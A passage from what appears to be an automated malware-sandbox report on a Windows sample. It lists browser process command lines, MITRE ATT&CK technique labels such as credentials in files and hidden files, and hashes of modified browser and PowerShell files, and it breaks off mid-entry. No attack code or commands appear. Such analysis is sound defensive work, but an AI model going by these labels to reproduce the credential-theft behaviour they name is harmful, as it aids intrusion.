  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4912 --field-trial-handle=2024,i,18325719269190135943,6464889710107201479,131072 /prefetch:8
  2⤵
  PID:5224
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4816 --field-trial-handle=2024,i,18325719269190135943,6464889710107201479,131072 /prefetch:8
  2⤵
  PID:3036
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4940 --field-trial-handle=2024,i,18325719269190135943,6464889710107201479,131072 /prefetch:8
  2⤵
  PID:6096
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5100 --field-trial-handle=2024,i,18325719269190135943,6464889710107201479,131072 /prefetch:8
  2⤵
  PID:5136
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4712 --field-trial-handle=2024,i,18325719269190135943,6464889710107201479,131072 /prefetch:8
  2⤵
  PID:5276
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=5092 --field-trial-handle=2024,i,18325719269190135943,6464889710107201479,131072 /prefetch:1
  2⤵
  PID:1656
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3356 --field-trial-handle=2024,i,18325719269190135943,6464889710107201479,131072 /prefetch:8
  2⤵
  PID:5684
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=2744 --field-trial-handle=2024,i,18325719269190135943,6464889710107201479,131072 /prefetch:1
  2⤵
  PID:5280
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=5316 --field-trial-handle=2024,i,18325719269190135943,6464889710107201479,131072 /prefetch:1
  2⤵
  PID:2784
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=4564 --field-trial-handle=2024,i,18325719269190135943,6464889710107201479,131072 /prefetch:1
  2⤵
  PID:1748
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=5520 --field-trial-handle=2024,i,18325719269190135943,6464889710107201479,131072 /prefetch:1
  2⤵
  PID:5912
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=6056 --field-trial-handle=2024,i,18325719269190135943,6464889710107201479,131072 /prefetch:1
  2⤵
  PID:5272
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=6052 --field-trial-handle=2024,i,18325719269190135943,6464889710107201479,131072 /prefetch:1
  2⤵
  PID:5960
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=2704 --field-trial-handle=2024,i,18325719269190135943,6464889710107201479,131072 /prefetch:1
  2⤵
  PID:2936
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=5428 --field-trial-handle=2024,i,18325719269190135943,6464889710107201479,131072 /prefetch:1
  2⤵
  PID:4428
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --mojo-platform-channel-handle=2868 --field-trial-handle=2024,i,18325719269190135943,6464889710107201479,131072 /prefetch:1
  2⤵
  PID:6112
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=5232 --field-trial-handle=2024,i,18325719269190135943,6464889710107201479,131072 /prefetch:1
  2⤵
  PID:3492
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=6236 --field-trial-handle=2024,i,18325719269190135943,6464889710107201479,131072 /prefetch:1
  2⤵
  PID:2620
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3328 --field-trial-handle=2024,i,18325719269190135943,6464889710107201479,131072 /prefetch:8
  2⤵
  PID:4416

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:4316

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefault4b7967b9h73dfh446eh940dhe7dab4913761
1⤵
PID:4568
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x124,0x128,0x100,0x12c,0x7ffdcdae46f8,0x7ffdcdae4708,0x7ffdcdae4718
  2⤵
  PID:3116
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,11119896912696345600,12633122397744456329,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:2
  2⤵
  PID:6408
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,11119896912696345600,12633122397744456329,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2256 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:6420
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2140,11119896912696345600,12633122397744456329,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2844 /prefetch:8
  2⤵
  PID:6484

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:6620

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:6708

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefault84d971f2h00efh4699ha65ch4f99e7e9b5f0
1⤵
PID:6680
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffdcdae46f8,0x7ffdcdae4708,0x7ffdcdae4718
  2⤵
  PID:6532
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,9907671251212517550,8012294721327730103,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2240 /prefetch:2
  2⤵
  PID:4880
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2208,9907671251212517550,8012294721327730103,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2292 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:6292
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2208,9907671251212517550,8012294721327730103,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3004 /prefetch:8
  2⤵
  PID:6340

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1900

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4920

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService
1⤵
PID:7100

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\1d71fa4d-2201-428a-b743-415e1428ce26.tmp

Filesize
255KB

MD5
3c1640b0813971a4a5bf580a749223e7

SHA1
2906b68bb862ba31086fb947a5b00679da24763e

SHA256
04af0c17995c38a315dd57810d5f5ecac1c889accebb3387873880b16bff775e

SHA512
adbf738037debf228f383dbb7ae2488bb9e7fb0a7e75d5bbdc6fad2888fab2ec3a0e71c25be97a1a4c6ebe7812561b41d8f85769aba009833fed9e9c3873c20f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

Filesize
40B

MD5
450092d409ea8bde7e3ca1247fc0de4a

SHA1
f021476a1ce1a12f956b79635e5d5f36c2d2a4b9

SHA256
ca89da096c19ce02a68a898f6107765e7e4f005843d72d8447098c38d18e73a7

SHA512
d8d879b863ed265eded8c2af06151f3685c2345c17c568c119adc3e435be020232c731930083d3bc1f93ef1efb65670b70dc0e8c5fcc507aa972d45f016d388e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\2c2a5521-c1ed-45f9-9311-6c989fdd60bd.tmp

Filesize
6KB

MD5
74aa85529edfe607ebff8a804bf5bd77

SHA1
6b757d45b148a45f13f8db07c754d9e44a3f9f17

SHA256
11ce58c19d2ca258be3d85b359c2d439667e3ddc99c9c6a67b554fee51058b24

SHA512
e1800cc12a0871353a2ab5d229b6ab5cd3037edb7a3ddee6e173fda6386f412518c2eaeadff351fec1d5c7aad8c9523e99b98ace887b7df0e45d323ffa4f3ffb

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000041

Filesize
64KB

MD5
7aa89f14c3c03e06a5705eecc92a609b

SHA1
b614539ce867fe953e3fec719e689ac7e2aebb00

SHA256
ec3f4f46674410b1555da9e0bb537b37dbcad67286fe6f83855f4f08c13ab730

SHA512
de8e3493a63ee949564ead440edd2dfc87329aa6049db79b41814427af28185f728244b00920036021147da144c7d064307ccc9db7184540a2f9b1e53337d4eb

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
577c15bcd7a665375a636a0be0b180c4

SHA1
b0018f9f4cb686ad4ae4dfcc16d4d3c87c54ce44

SHA256
87cc3bd836855cab0f7476200bfa1a5554504b1df5c9b9940e4f470c83cdd12b

SHA512
87f513bc45d49dee187566a51351031ed355f77e6c1a31b80d3869b6f6e545dabd2f267f144e1fbbebe35143ee8c599b8e2031c8467198ac495646af37df7718

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\8ac25357-4ca2-4003-a144-ba9244a6795c.tmp

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
9KB

MD5
0548cdcba9cc93654335c56ccc890fdb

SHA1
80e69ea8a7e9e725e1d6df9ac9fe84fdaf2446a8

SHA256
b1c5b10e5b14bd57424717802527dc2f8c23f0b4eaca7a0a2d351083f75ffc50

SHA512
d6a767530c4fa33be08ce3e7682d60fcd9bc50173a7a96539202eb555c0a9f635dc99e4f29c72307d92a346edb8b8e42845b9fb61ed183905ad59fd1b20351d7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
5eb197fb0512b0d489b4e9cc70346775

SHA1
d8cec61c26a3a9f242e6bef21dcc15eb4360fb02

SHA256
027fceb3df68b275a3d79b8de6ffbbe26e61e6b7828fb255061295ba59f19922

SHA512
45b7cf68664fcf3e12ac9c273146263deb66ab9b63a312242c12f5992c5ba3c2d64c0f619a2a800f392417b8b4f5700d636c577dd48872eeca515c108ba8172c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
2KB

MD5
49a9d3844366362c93046b9410aaa814

SHA1
d2baa9e9e51f483fde14ea729a2f0631d1d651d2

SHA256
9740699a95b28c31924380c642926a7740fb79145835bfd66f44db6e0079c375

SHA512
e24fa1eb55e3456d3cc352f55757d1383f0d6c85afab942447d9e6f37bd1f2a326260fea4f5b348cf04e251982c7a242fd0fc848b50e85a03ceb86b1825e1128

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
2KB

MD5
3da70f9001c5c8c923c5fa7b576792e7

SHA1
3121e96db6b18a3d93cb10069b2362868fcb9ccd

SHA256
d4498dc179f732de98d418b3f7eca7de613ef9ec76a1d146c3eb5ed6c6702b8f

SHA512
67163aa9bf9ec852f96ecac0194f78efcc145a7bd9d95605f7545766d1e64c7c27255d463851645b3567790d0cc283f099cd374ffadeeb98779b850d5ff5c304

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
36186b5cd380e9ec36e4e6236fa669a8

SHA1
9c8eae5fc9c70926f19e9b289d8483d43a62a523

SHA256
9436b54d9cef6098d2b54935f81f2e7eb604edb066af68197f8c7721ee2983a5

SHA512
34125835690aa5f1900f41c542838d68c4e2e4250968c7b3598e93585b4854a80e1d83fd628931d4b5e6f447b025172d7ba43282ce2c9cd5b391ed8984ba9600

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
61ad55cb5379b7d379019319070d5a15

SHA1
a5c31777791c8721983658593b3e03b43494992d

SHA256
a33ac6f6543d174095893ba899e6d545a116c7ce6da29e3b178e0cbfaeeff350

SHA512
93ac21ef501600e9fe6c1c40e745ff19ae5b909faba1fb1efbd9fd5e7d49a51677133e99e9086eaf3de87f8aaccaf21cee73d6d053722f8eaabe7097e4918771

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
16KB

MD5
f090ddc110aa1bd711b28c35337e7000

SHA1
486e7a465b4118e94071807deaf51bbdc05934a9

SHA256
a1134c4d542839ec964dab5980f00892456e728395cd47aef8c44073898cb1de

SHA512
dd1e08c389402cd6f0e8d4ed2d841ba87fd1f64833af0eef1b4a0030c9cf24f0a22f7d2c98fc097e2f9a75e09d85302e9f40064b258400c57a3c42e84943274e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
254KB

MD5
736c86643236d05227b429ffee4d31dc

SHA1
f5ed33b5e3a9078ce3046cc2b3226779e47711be

SHA256
fd1426e04a6be37b8c3ee3ef3f4e7369c7f3f769248791a46c732090a00dc081

SHA512
7d56983a09eb5c767b878999740af25ecd790c2078f40730a21106bcd5b8924aabb130a7d83b3f6668ee190b40cc370b5612728abedeefa0d5d09cbe9d25c492

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
254KB

MD5
b7337e008cef712b8a42fe702848186f

SHA1
c9781c8033e87ab2fa77c02ba5ed9b9457643118

SHA256
f4bac5f558589dd5628b7f4acad702edc69c716dfe52c0bd1d9b56b744b7a883

SHA512
8c2b5793c8b878db48b97756d82d84b59e5ae23648076716c7b46f89c055c389b104f5575a4c70d5fa1a185c41a578d9e8288bfc033e188bf7b235e52d0cfd44

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
274KB

MD5
e7878aee8555543e85255bade573fc81

SHA1
98bf7d12050ac63d3b3d91d9623fd41027a19402

SHA256
121eee12039711b840247944dd7b0263d0aaa25b7d681f38cee0d2103d237755

SHA512
f5634ff080f5efef675e9d8758f8bb6ffb8cb34611579ac81d17d22255a1d67b08a5b25f6cff7cae1e0356a81668068a9af359530baa2cab1fdac83f171f631b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
252KB

MD5
d8b6705982fecc6e7895dadba15856a9

SHA1
4471dd03d2f9f2a05d1a1e709feff658d4779218

SHA256
38efbbc74ee4773561f6520dfe8363f0eaf6a05a06b89911ac139772909eab7c

SHA512
83a77b49e57a2da9d21d154b5924a82d9a356404dc5ba5aabd0351a8d8009281302af8317c75c235d3a970637242c4ea2b493fea3a48eaeb55756e43f238525a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

Filesize
100KB

MD5
0f23cd818465bbfc23e8f01d3405a2e8

SHA1
3d561fbda82fd0f542b0d473d819d54bfbb13576

SHA256
3e8ef049842cb0349988d46b4d2910f30ae7116b77229475d35c22d91e042426

SHA512
e2981cf4420ef2d69408e29ab74ff041d10d0799d54afcd46f571516eefe2e576948b96bddd34e255fe42924cb775dcaa8271e6af2952f7ffe5075963b164118

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

Filesize
91KB

MD5
3e8f4798e5dfa0adede1f7dd8603c526

SHA1
1da752d8746744acc7724ed4a77d06b8a6af82ed

SHA256
1f3e0eebe3eef25393475ccd8bbf2de0e9929e88d4eed3a5bb3f3e2a64f52980

SHA512
8d245e26613ddb692ddcf278e76b90392de5d57a43043a006cb2764e3a967f635cefc9af1cbe8c4bd4d4f75267aad683034ff27d4a2cc49d64e8c6babe364838

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe5857c0.TMP

Filesize
88KB

MD5
36e214bf8223493c83b52180817feff3

SHA1
8298e61d45e6ff52d1bb7fe74fe5486eef438775

SHA256
f4cef2e1c3faada86490b3895eccad4b6554a40b1348d0fc6dd6612d0ac25aa1

SHA512
dbd1de85a1567f019fed97d0bcd1a1f84960782dda0033cfd1bb3021aeecdd447e61f9c3a81793e4ac41a28769abd7f39d2efab879e6bb6f90f13c6e5a89c948

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
dc629a750e345390344524fe0ea7dcd7

SHA1
5f9f00a358caaef0321707c4f6f38d52bd7e0399

SHA256
38b634f3fedcf2a9dc3280aa76bd1ea93e192200b8a48904664fac5c9944636a

SHA512
2a941fe90b748d0326e011258fa9b494dc2f47ac047767455ed16a41d523f04370f818316503a5bad0ff5c5699e92a0aaf3952748b09287c5328354bfa6cc902

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
cff358b013d6f9f633bc1587f6f54ffa

SHA1
6cb7852e096be24695ff1bc213abde42d35bb376

SHA256
39205cdf989e3a86822b3f473c5fc223d7290b98c2a3fb7f75e366fc8e3ecbe9

SHA512
8831c223a1f0cf5f71fa851cdd82f4a9f03e5f267513e05b936756c116997f749ffa563623b4724de921d049de34a8f277cc539f58997cda4d178ea205be2259

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\314e0883-67fd-4e86-be93-d4e87675f7ae.tmp

Filesize
1B

MD5
5058f1af8388633f609cadb75a75dc9d

SHA1
3a52ce780950d4d969792a2559cd519d7ee8c727

SHA256
cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

SHA512
0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
264e94b7416c40bc31a5ffb2a36e6f51

SHA1
f13ae24c279ac4dbbc272786f636f83fc48bf57e

SHA256
1d311af7e77888c7728f7f547bcfa2c5be7e96e535e35b7afaab67237eb482fe

SHA512
5b27ede93a6f5cc92c5b8eaed5893048a4b60d695a68812b7a0739da217dd674d222b8cbd825aa7843999e1e205db6e0d13a9ee32190cf94299f3c517ffb9c0f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
8KB

MD5
3dbc525838c33afcc1222cca9b9a0fb4

SHA1
f8d2b2d2b646627acf0c65754ff735cc79f9986e

SHA256
31a45f994f85b8de72a88bc8de3e44ec1695f25a79d0586881922d7ba4d4a529

SHA512
62ab90264356232ebc5eaae1ee1e359f16df0b82d8d2d6fc0df1bf6d6bb8cab2ae0087bc4105b4c712eb81356b419d20cce46d61a959fee5231515b4fbca576b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
2979eabc783eaca50de7be23dd4eafcf

SHA1
d709ce5f3a06b7958a67e20870bfd95b83cad2ea

SHA256
006cca90e78fbb571532a83082ac6712721a34ea4b21f490058ffb3f521f4903

SHA512
92bc433990572d9427d0c93eef9bd1cc23fa00ed60dd0c9c983d87d3421e02ce3f156c6f88fe916ef6782dbf185cbce083bc0094f8c527f302be6a37d1c53aba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d8cb3e9459807e35f02130fad3f9860d

SHA1
5af7f32cb8a30e850892b15e9164030a041f4bd6

SHA256
2b139c74072ccbdaa17b950f32a6dbc934dfb7af9973d97c9b0d9c498012ba68

SHA512
045239ba31367fbdd59e883f74eafc05724e23bd6e8f0c1e7171ea2496a497eb9e0cfcb57285bb81c4d569daadba43d6ef64c626ca48f1e2a59e8d97f0cc9184

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5c913d126db085fa635501f5fc7ebaf7

SHA1
c3026843f104c35b04d671e106b498294df210fb

SHA256
45b5a6840d6bbaf77e5cbcd8d95900ed5686463d8cd9d0d64f9bb75013212578

SHA512
9570c10612e69a9290bbe00814838cc98532b7b88b39226c0edd9f7e4a43345be6c80bac78817bcf2251dd6ae474d2ca0af8d7198e4055271eb2420f9d18e8ae

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
276798eeb29a49dc6e199768bc9c2e71

SHA1
5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

SHA256
cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

SHA512
0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\xgut1z79.default-release\activity-stream.discovery_stream.json.tmp

Filesize
24KB

MD5
8acfb195606d3590933c951232471397

SHA1
cbed20c8c6aef18e7eb3f3c8f7fb56bf21f98124

SHA256
f0cd58f2331dbd533a1c3ac31e6d765542e0766f3f12aa05d245ce8e948f09ab

SHA512
